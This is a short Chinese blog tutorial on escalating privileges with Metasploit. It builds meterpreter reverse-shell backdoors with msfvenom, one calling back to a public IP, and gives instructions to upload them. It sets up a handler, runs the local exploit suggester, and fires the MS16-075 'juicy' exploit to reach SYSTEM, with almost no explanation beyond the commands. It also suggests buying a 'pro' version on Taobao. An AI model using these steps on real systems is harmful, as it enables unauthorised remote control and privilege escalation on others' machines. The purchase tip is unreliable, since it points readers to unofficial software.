MSF使用教程-CSDN博客
利用MSF提权
目前的msf版本有bug可以TB上购买pro版本嘎嘎稳
https://blog.csdn.net/qq_46717339/article/details/122653084
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall
启动msf:
msfconsole
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.14 LPORT=4444 -f exe -o msf.exe
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=43.159.45.90 LPORT=1122 -f elf -o msf

上传msf.exe


use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp //payload与上面生成后门的模块保持一致
set lhost 0.0.0.0
set lport 3333

这里设置0.0.0.0就是监听本地所有的网卡
监听端口3333 记得放行安全组




全自动:快速识别系统中可能被利用的漏洞
background //返回
use post/multi/recon/local_exploit_suggester
set showdescription true //设置为显示说明


可以看到这里seesion为空,我们要设置session


检测完后,就会显示可能存在的漏洞
background
use exploit/windows/local/ms16_075_reflection_juicy
set session 1
exploit





可以看到getuid 返回是system